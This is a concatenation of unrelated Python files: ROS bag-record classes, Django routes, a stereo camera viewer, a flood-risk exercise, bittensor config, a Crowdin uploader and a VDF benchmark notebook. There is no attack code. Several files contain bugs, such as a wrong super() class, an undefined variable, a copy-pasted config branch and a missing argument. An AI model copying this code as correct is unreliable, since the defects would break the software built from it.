has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float64MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Header(bag_records.records.RecordBase):
"""Record for std_msgs/Header types
"""
def __init__(self, has_msg_time=True):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Defaults True since header has a time stamp
Returns:
class instance
"""
super(Bool, self).__init__(has_msg_time=has_msg_time, interpolate=False)
self._fields = {
'frame_id': [], 'seq': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int16(bag_records.records.RecordBase):
"""Record for std_msgs/Int16 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int16, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int16MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int16MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int16MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int32(bag_records.records.RecordBase):
"""Record for std_msgs/Int32 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int32, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int32MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int32MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int32MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int64(bag_records.records.RecordBase):
"""Record for std_msgs/Int64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int64, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int64MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int64MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int64MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int8(bag_records.records.RecordBase):
"""Record for std_msgs/Int8 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int8, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Int8MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Int8MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Int8MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class String(bag_records.records.RecordBase):
"""Record for std_msgs/Int64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(String, self).__init__(
has_msg_time=has_msg_time, interpolate=False)
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
def close(self):
"""Close the bag
Overrides base method for this, we can't interp it so there's no reason
to make it a numpy array. We will still array up the stamps
Arguments:
no arguments
Returns:
no returns
"""
self._fields['bag_time'] = numpy.array(self._fields['bag_time'])
if self._has_msg_time:
self._fields['msg_time'] = numpy.array(self._fields['msg_time'])
class Time(bag_records.records.RecordBase):
"""Record for std_msgs/Time types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Time, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt16(bag_records.records.RecordBase):
"""Record for std_msgs/UInt16 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt16, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt16MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt16MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt16MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt32(bag_records.records.RecordBase):
"""Record for std_msgs/UInt32 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt32, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt32MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt32MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt32MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt64(bag_records.records.RecordBase):
"""Record for std_msgs/UInt64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt64, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt64MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt64MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt64MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt8(bag_records.records.RecordBase):
"""Record for std_msgs/UInt8 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt8, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class UInt8MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/UInt8MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(UInt8MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
|
from django.conf.urls import patterns, url
from things.views import ThingDetailView, ThingListView
from .models import Post, PostPhoto
urlpatterns = patterns(
'',
url(r'^posts/$',
ThingListView.as_view(model=Post),
name='post_list'),
url(r'^posts/(?P<slug>[\w\-\/]+)/$',
ThingDetailView.as_view(model=Post),
name='post_detail'),
url(r'^post-photos/(?P<slug>[\w\-\/]+)/$',
ThingDetailView.as_view(model=PostPhoto),
name='post_photo_detail'),
)
|
# Generated by Django 3.1.7 on 2021-04-09 14:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('rest_api', '0007_auto_20210409_1717'),
]
operations = [
migrations.RemoveField(
model_name='extremesport',
name='country',
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Illustration of Theiler window using an AR(1) series.
An AR(1) time series is temporally correlated. Thus, if a judicious
(nonzero) value of the Theiler window is not used, the estimated
dimension converges to the fractal dimension of the trajectory formed by
the time series in the phase space. This, however, has nothing to do
with any low-dimensional nature of the underlying process.
"""
from nolitsa import d2
import numpy as np
import matplotlib.pyplot as plt
N = 5000
x = np.empty(N)
np.random.seed(882)
n = np.random.normal(size=(N), loc=0, scale=1.0)
a = 0.998
x[0] = n[0]
for i in range(1, N):
x[i] = a * x[i - 1] + n[i]
# Delay is the autocorrelation time.
tau = 400
dim = np.arange(1, 10 + 1)
plt.figure(1)
plt.title(r'Local $D_2$ vs $r$ for AR(1) time series with $W = 0$')
plt.xlabel(r'Distance $r$')
plt.ylabel(r'Local $D_2$')
for r, c in d2.c2_embed(x, tau=tau, dim=dim, window=0):
plt.semilogx(r[3:-3], d2.d2(r, c))
plt.figure(2)
plt.title(r'Local $D_2$ vs $r$ for AR(1) time series with $W = 400$')
plt.xlabel(r'Distance $r$')
plt.ylabel(r'Local $D_2$')
for r, c in d2.c2_embed(x, tau=tau, dim=dim, window=400):
plt.semilogx(r[3:-3], d2.d2(r, c))
plt.show()
|
__version__ = "2.0.1"
# __version__ has to be defined in the first line
from .classifiers import (Box_Plot, Equal_Interval, Fisher_Jenks,
Fisher_Jenks_Sampled, HeadTail_Breaks, Jenks_Caspall,
Jenks_Caspall_Forced, Jenks_Caspall_Sampled,
Max_P_Classifier, Maximum_Breaks, Natural_Breaks,
Quantiles, Percentiles, Std_Mean, User_Defined,
load_example, gadf, K_classifiers, CLASSIFIERS)
|
#!/usr/bin/env python3
import cv2
import depthai as dai
import numpy as np
# Start defining a pipeline
pipeline = dai.Pipeline()
# Define a source - two mono (grayscale) cameras
cam_left = pipeline.createMonoCamera()
cam_left.setCamId(1)
cam_left.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
cam_right = pipeline.createMonoCamera()
cam_right.setCamId(2)
cam_right.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
# Create outputs
xout_left = pipeline.createXLinkOut()
xout_left.setStreamName('left')
cam_left.out.link(xout_left.input)
xout_right = pipeline.createXLinkOut()
xout_right.setStreamName('right')
cam_right.out.link(xout_right.input)
# Pipeline defined, now the device is assigned and pipeline is started
device = dai.Device(pipeline)
device.startPipeline()
# Output queues will be used to get the grayscale frames from the outputs defined above
q_left = device.getOutputQueue(name="left", maxSize=4, overwrite=True)
q_right = device.getOutputQueue(name="right", maxSize=4, overwrite=True)
frame_left = None
frame_right = None
while True:
# instead of get (blocking) used tryGet (nonblocking) which will return the available data or None otherwise
in_left = q_left.tryGet()
in_right = q_right.tryGet()
if in_left is not None:
# if the data from the left camera is available, transform the 1D data into a frame
frame_left = in_left.getData().reshape((in_left.getHeight(), in_left.getWidth())).astype(np.uint8)
frame_left = np.ascontiguousarray(frame_left)
if in_right is not None:
# if the data from the right camera is available, transform the 1D data into a frame
frame_right = in_right.getData().reshape((in_right.getHeight(), in_right.getWidth())).astype(np.uint8)
frame_right = np.ascontiguousarray(frame_right)
# show the frames if available
if frame_left is not None:
cv2.imshow("left", frame_left)
if frame_right is not None:
cv2.imshow("right", frame_right)
if cv2.waitKey(1) == ord('q'):
break
|
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.station import MonitoringStation
from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.analysis import polyfit
import numpy as np
import datetime
# Defining parameters for risk levels globally
global high, moderate, severe
high = 1
severe = 2
moderate = 1.5
def run():
# Building station list and updating water levels
stations = build_station_list()
update_water_levels(stations)
# This program will mainly use the current water level compared to its typical high level as an
# indication factor of weather it will flood
risk_levels = []
for i in range(len(stations)):
risk_level = stations[i].relative_water_level()
risk_levels.append(risk_level)
# Creating lists to fill with stations
severe_risk_towns = []
high_risk_towns = []
moderate_risk_towns = []
low_risk_towns = []
# Adding to lists dependent on risk level
for i in range(len(risk_levels)):
if risk_levels[i] != None:
if risk_levels[i] > severe:
severe_risk_towns.append(stations[i])
elif high < risk_levels[i] < severe:
high_risk_towns.append(stations[i])
elif moderate < risk_levels[i] < high:
moderate_risk_towns.append(stations[i])
else:
low_risk_towns.append(stations[i])
# Defining a list to fill with towns where risk level is increasing
water_level_increasing = []
water_level_decreasing = []
corrupt_stations = []
for i in range(len(high_risk_towns)):
# Fetching data for polyfit function to approximate function
try:
dates = fetch_measure_levels(high_risk_towns[i].measure_id, dt=datetime.timedelta(days=2))[0]
levels = fetch_measure_levels(high_risk_towns[i].measure_id, dt=datetime.timedelta(days=2))[1]
except:
corrupt_stations.append(high_risk_towns[i].name)
flag = True
if len(dates) == 0:
flag = False
for j in range(len(levels)):
if type(levels[j]) != float:
flag = False
if flag == True:
poly_tuple = polyfit(dates, levels, 4)
poly = poly_tuple[0]
# Taking derivative
derivative = np.polyder(poly, m=1)
# Evaluating at the time now (list begins at most recent data)
derivative_now = derivative(0)
# If derivative greater than 0 then water level increasing!
if derivative_now > 0:
water_level_increasing.append(high_risk_towns[i])
if derivative_now < 0:
water_level_decreasing.append(high_risk_towns[i])
else:
corrupt_stations.append(high_risk_towns[i].name)
print(corrupt_stations)
# Setting condition to prevent an infinite loop
choice = True
while choice == True:
# Asking for user input to decide what list will be displayed
print('\nPlease enter a valid risk level: severe, high, moderate or low, or press enter to quit program')
option = str(input("What risk level would you like to see? "))
if option == "severe":
# Constructing statement of towns at severe risk
severe_statement = "----The towns at severe risk are: "
# Constructing statement for decrease in water levels
severe_changing_statement = "Phew- looks like the worst is behind these towns: "
# Iterating through severe risk towns to ass them to the list
for i in range(len(severe_risk_towns)):
severe_statement += "{}, ".format(severe_risk_towns[i].name)
# Adding to list of towns that may soon be safe
if severe_risk_towns[i] in water_level_decreasing:
severe_changing_statement += "{}".format(severe_risk_towns[i].name)
# Printing list
print(severe_statement)
# Repeating for other options
elif option == "high":
high_statement = "\n----The towns at high risk are: "
high_changing_statement = "\n!!! THESE AREAS MAY SOON BE AT SEVERE RISK: "
for i in range(len(high_risk_towns)):
high_statement += "{}, ".format(high_risk_towns[i].name)
if high_risk_towns[i] in water_level_increasing:
high_changing_statement += "{}, ".format(high_risk_towns[i].name)
print(high_statement)
print(high_changing_statement + "!!!")
elif option == "moderate":
moderate_statement = "\n----The towns at moderate risk are: "
for i in range(len(moderate_risk_towns)):
moderate_statement += "{}, ".format(moderate_risk_towns[i].name)
print(moderate_statement)
elif option == "low":
low_statement = "\n----The towns at low risk are: "
for i in range(len(low_risk_towns)):
low_statement += "{}, ".format(low_risk_towns[i].name)
if low_risk_towns[i] in water_level_increasing:
low_changing_statement += "{}, ".format(low_risk_towns[i].name)
print(low_statement)
print(low_changing_statement)
# Allowing exit from loop
elif option == '':
choice = False
# Allowing for possibility that user enters invalid responce
else:
print("This is not a valid response")
if __name__ == "__main__":
print("\n*** Task 2G: CUED Part IA Flood Warning System ***")
run()
|
from validator.decorator import version_range
from validator.constants import (FIREFOX_GUID, FENNEC_GUID,
THUNDERBIRD_GUID as TB_GUID, ANDROID_GUID)
# Compatibility app/version ranges:
def _build_definition(maj_version_num, firefox=True, fennec=True,
thunderbird=True, android=True):
definition = {}
app_version_range = (
lambda app: version_range(app, '%d.0a1' % maj_version_num,
'%d.0a1' % (maj_version_num + 1)))
if firefox:
definition[FIREFOX_GUID] = app_version_range('firefox')
if fennec:
definition[FENNEC_GUID] = app_version_range('fennec')
if thunderbird:
definition[TB_GUID] = app_version_range('thunderbird')
if android:
definition[ANDROID_GUID] = app_version_range('android')
return definition
FX45_DEFINITION = _build_definition(45)
FX46_DEFINITION = _build_definition(46)
FX47_DEFINITION = _build_definition(47)
FX48_DEFINITION = _build_definition(48)
|
"""
Implementation of the config class, which manages the config of different bittensor modules.
"""
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import yaml
from munch import Munch
import bittensor
class Config ( Munch ):
"""
Implementation of the config class, which manages the config of different bittensor modules.
"""
def __init__(self, loaded_config = None ):
super().__init__()
if loaded_config:
raise NotImplementedError('Function load_from_relative_path is not fully implemented.')
def __repr__(self) -> str:
return self.__str__()
def __str__(self) -> str:
return "\n" + yaml.dump(self.toDict())
def to_string(self, items) -> str:
""" Get string from items
"""
return "\n" + yaml.dump(items.toDict())
def update_with_kwargs( self, kwargs ):
""" Add config to self
"""
for key,val in kwargs.items():
self[key] = val
def to_defaults(self):
try:
if 'axon' in self.keys():
bittensor.defaults.axon.port = self.axon.port
bittensor.defaults.axon.ip = self.axon.ip
bittensor.defaults.axon.max_workers = self.axon.max_workers
bittensor.defaults.axon.maximum_concurrent_rpcs = self.axon.maximum_concurrent_rpcs
if 'dataset' in self.keys():
bittensor.defaults.dataset.batch_size = self.dataset.batch_size
bittensor.defaults.dataset.block_size = self.dataset.block_size
bittensor.defaults.dataset.max_corpus_size = self.dataset.max_corpus_size
bittensor.defaults.dataset.num_workers = self.dataset.num_workers
bittensor.defaults.dataset.dataset_name = self.dataset.dataset_name
bittensor.defaults.dataset.data_dir = self.dataset.data_dir
bittensor.defaults.dataset.save_dataset = self.dataset.save_dataset
if 'dendrite' in self.keys():
bittensor.defaults.dataset.batch_size = self.dataset.batch_size
bittensor.defaults.dataset.block_size = self.dataset.block_size
bittensor.defaults.dataset.max_corpus_size = self.dataset.max_corpus_size
bittensor.defaults.dataset.num_workers = self.dataset.num_workers
bittensor.defaults.dataset.dataset_name = self.dataset.dataset_name
bittensor.defaults.dataset.data_dir = self.dataset.data_dir
bittensor.defaults.dataset.save_dataset = self.dataset.save_dataset
if 'logging' in self.keys():
bittensor.defaults.logging.debug = self.logging.debug
bittensor.defaults.logging.trace = self.logging.trace
bittensor.defaults.logging.record_log = self.logging.record_log
bittensor.defaults.logging.logging_dir = self.logging.logging_dir
if 'subtensor' in self.keys():
bittensor.defaults.subtensor.network = self.subtensor.network
bittensor.defaults.subtensor.chain_endpoint = self.subtensor.chain_endpoint
if 'threadpool' in self.keys():
bittensor.defaults.threadpool.max_workers = self.threadpool.max_workers
bittensor.defaults.threadpool.maxsize = self.threadpool.maxsize
if 'wallet' in self.keys():
bittensor.defaults.wallet.name = self.wallet.name
bittensor.defaults.wallet.hotkey = self.wallet.hotkey
bittensor.defaults.wallet.path = self.wallet.path
if 'wandb' in self.keys():
bittensor.defaults.wandb.name = self.wandb.name
bittensor.defaults.wandb.project = self.wandb.project
bittensor.defaults.wandb.tags = self.wandb.tags
bittensor.defaults.wandb.run_group = self.wandb.run_group
bittensor.defaults.wandb.directory = self.wandb.directory
bittensor.defaults.wandb.offline = self.wandb.offline
except Exception as e:
print('Error when loading config into defaults {}'.format(e))
|
from dataclasses import dataclass
from pathlib import Path
from dataclasses import dataclass, field
from loguru import logger
from libraries.crowdin import UECrowdinClient
from libraries.utilities import LocTask
@dataclass
class AddSourceFiles(LocTask):
# Declare Crowdin parameters to load them from config
token: str = None
organization: str = None
project_id: int = None
# TODO: Process all loc targets if none are specified
# TODO: Change lambda to empty list to process all loc targets when implemented
loc_targets: list = field(
default_factory=lambda: ['Game']
) # Localization targets, empty = process all targets
file_format: str = 'auto' # gettext_unreal to use the Unreal PO parser on Crowdin
src_locale: str = 'io'
export_pattern: str = '{target}/%locale%/{target}.po'
# TODO: Do I need this here? Or rather in smth from uetools lib?
content_dir: str = '../'
_fname: str = 'Localization/{target}/{locale}/{target}.po'
_content_path: Path = None
def post_update(self):
super().post_update()
self._content_path = Path(self.content_dir).resolve()
self._fname = self._fname.format(locale=self.src_locale, target='{target}')
def add_source_files(self):
crowdin = UECrowdinClient(
self.token, logger, self.organization, self.project_id
)
logger.info(f'Content path: {self._content_path}')
targets_processed = []
for target in self.loc_targets:
fpath = self._content_path / self._fname.format(target=target)
logger.info(f'Uploading file: {fpath}. Format: {self.file_format}')
r = crowdin.add_file(
fpath,
type=self.file_format,
export_pattern=self.export_pattern.format(target=target),
)
if r == True:
targets_processed += [target]
logger.info(f'File for {target} added.')
else:
logger.error(
f'Something went wrong. Here\'s the last response from Crowdin: {r}'
)
if len(targets_processed) == len(self.loc_targets):
print('Targets processed', len(targets_processed), targets_processed)
return True
return False
def main():
logger.add(
'logs/locsync.log',
rotation='10MB',
retention='1 month',
enqueue=True,
format='{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}',
level='INFO',
)
logger.info('')
logger.info('--- Add source files on Crowdin script start ---')
logger.info('')
task = AddSourceFiles()
task.read_config(Path(__file__).name, logger)
result = task.add_source_files()
logger.info('')
logger.info('--- Add source files on Crowdin script end ---')
logger.info('')
if result:
return 0
return 1
# Run the main functionality of the script if it's not imported
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import hashlib
import time
import math
import matplotlib.pyplot as plt
from random import SystemRandom, randint
"""
generate a number of length
"""
def generate_number(k):
random = SystemRandom()
p = random.getrandbits(k)
binary = bin(p)
new_binary = binary[0:len(binary) - 1] + "1"
return int(new_binary, 2)
def generate_prime_number_below_bits(x):
prime = int(''.join(map(str,[randint(0,1) for _ in range(x)])),2)
while not check_prime(prime):
prime = int(''.join(map(str,[randint(0,1) for _ in range(x)])),2)
return prime
"""
Performs Miller Rabin Test
Input : n = number, r
"""
def miller_rabin_test(r, n):
a = 2 + randint(2, n - 2)
p = pow(a, r, n)
if p == 1 or p == n - 1:
return True
while r != (n - 1):
p = pow(p, 2, n)
r *= 2
if p == 1:
return False
if p == (n - 1):
return True
return False
"""
performs prime check
Input : n = number which has to be checked
Output : true or false
"""
def check_prime(n):
if n == 2 or n == 3:
return True
elif n <= 1 or n % 2 == 0:
return False
r = n - 1
while r % 2 == 0:
r //= 2
for i in range(128):
if not miller_rabin_test(r, n):
return False
return True
"""
generate a prime number
"""
def give_prime(k):
prime = generate_number(k)
while not check_prime(prime):
prime = generate_number(k)
return prime
def give_parameters():
return (SystemRandom().randint(0,100), SystemRandom().randint(1,100), give_prime())
# # Fast Modular Power Calculation
# In[2]:
def power(x, a, N) :
res = 1 # Initialize result
# Update x if it is more
# than or equal to p
x = x % N
if (x == 0) :
return 0
while (a > 0) :
# If y is odd, multiply
# x with result
if ((a & 1) == 1) :
res = (res * x) % N
# y must be even now
a = a >> 1 # y = y/2
x = (x * x) % N
return res
# # VDF Setup -- the basic parameter (N, x) will be the same all VDF scheme
#
# ### N -- Module
# ### x -- sample instance
# In[3]:
def Setup(Lambda, j):
# start_1 = time.time()
# start_2 = time.time()
# start_3 = time.time()
p = give_prime(Lambda);
q = give_prime(Lambda);
x = generate_number(Lambda)
start_1 = time.time()
start_2 = time.time()
start_3 = time.time()
N = p * q
phiN = (p-1)*(q-1)
T = 2**j
end_3 = time.time()
t = (2**T) % phiN
ybar = power(x, t, N)
Gamma = hashlib.sha512(str(ybar).encode())
end_2 = time.time()
Tcap = SystemRandom().randint(1,T)
xcap = power(x, Tcap, N)
end_1 = time.time()
st_1 = round((end_1-start_1) * 1000, 5) # For Proposed VDF - 1
st_2 = round((end_2-start_2) * 1000, 5) # For Proposed VDF - 2
st_3 = round((end_3-start_3) * 1000, 5) # For Wesoloski and Pietrzak VDF
return (N, x, xcap, T, Tcap, Gamma, st_1, st_2, st_3)
# ## Wesoloski's VDF (Efficient VDF)
# In[4]:
def Wes_Eval(Lambda, N, x, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 2)
# print("\nEvaluation Time:", {et})
start = time.time()
l = give_prime(2*Lambda)
q = (2**T)//l
pi = power(x, q, N)
end = time.time()
pt = round((end-start) * 1000, 5)
# print("Proof Generation Time:", {pt})
return y, pi, l, et, pt
# In[5]:
def Wes_Verify(Lambda, N, x, T, y, pi, l):
start = time.time()
r = 2**T % l
ycap = (power(pi, l, N) * power(x, r, N)) % N
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(y == ycap):
return 1, vt
return 0, vt
# In[6]:
def Wes_Main(Lambda, N, x, T):
y, pi, l, et, pt = Wes_Eval(Lambda, N, x, T)
out, vt = Wes_Verify(Lambda, N, x, T, y, pi, l)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, pt, vt
# ## Pietrzak's VDF (Simple VDF)
# In[7]:
def Pie_Eval(Lambda, N, x, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 2)
# print("\nEvaluation Time:", {et})
start = time.time()
xprime = x
yprime = y
pi = []
r = []
for i in range(1, round(math.log2(T))+1):
pi.append(pow(xprime, (2**int(T/(2**i))), N))
r.append(give_prime(Lambda//2))
xprime = (pow(xprime, r[i-1], N) * pi[i-1]) % N
yprime = (pow(pi[i-1], r[i-1], N) * yprime) % N
end = time.time()
pt = round((end-start) * 1000, 5)
# print("Proof Generation Time:", {pt})
return y, pi, r, et, pt
# In[8]:
def Pie_Verify(Lambda, N, x, T, y, pi, r):
start = time.time()
xprime = x
yprime = y
for i in range(1, round(math.log2(T))+1):
xprime = (pow(xprime, r[i-1], N) * pi[i-1]) % N
yprime = (pow(pi[i-1], r[i-1], N) * yprime) % N
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(yprime == ((xprime*xprime) % N)):
return 1, vt
return 0, vt
# In[9]:
def Pie_Main(Lambda, N, x, T):
y, pi, r, et, pt = Pie_Eval(Lambda, N, x, T)
out, vt = Pie_Verify(Lambda, N, x, T, y, pi, r)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, pt, vt
# ## The proposed VDF Scheme -- 1
# In[10]:
def DH_Eval_1(Lambda, N, x, xcap, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 5)
# print("\nEvaluation Time:", {et})
pi = power(xcap, 2**T, N)
return y, pi, et
# In[11]:
def DH_Verify_1(Lambda, N, x, xcap, T, Tcap, y, pi):
start = time.time()
ycap = power(y, Tcap, N)
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(ycap == pi):
return 1, vt
return 0, vt
# In[12]:
def DH_Main_1(Lambda, N, x, xcap, T, Tcap):
y, pi, et = DH_Eval_1(Lambda, N, x, xcap, T)
out, vt = DH_Verify_1(Lambda, N, x, xcap, T, Tcap, y, pi)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, vt
# ## The proposed VDF Scheme -- 2 (Optmized version of the Scheme - 1)
# In[13]:
def DH_Eval_2(Lambda, N, x, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 5)
# print("\nEvaluation Time:", {et})
return y, et
# In[14]:
def DH_Verify_2(y, Gamma):
start = time.time()
GammaCap = hashlib.sha512(str(y).encode())
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(GammaCap.hexdigest() == Gamma.hexdigest()):
return 1, vt
return 0, vt
# In[15]:
def DH_Main_2(Lambda, N, x, T, Gamma):
y, et = DH_Eval_2(Lambda, N, x, T)
out, vt = DH_Verify_2(y, Gamma)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, vt
# # Graph Plots
# ## Setup Time
# In[16]:
def Setup_Time_Plot(Time, dhvdf_1_st, dhvdf_2_st, wesvdf_st, pievdf_st):
for i in range(len(dhvdf_1_st)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_st[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_st[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_st[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_st[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
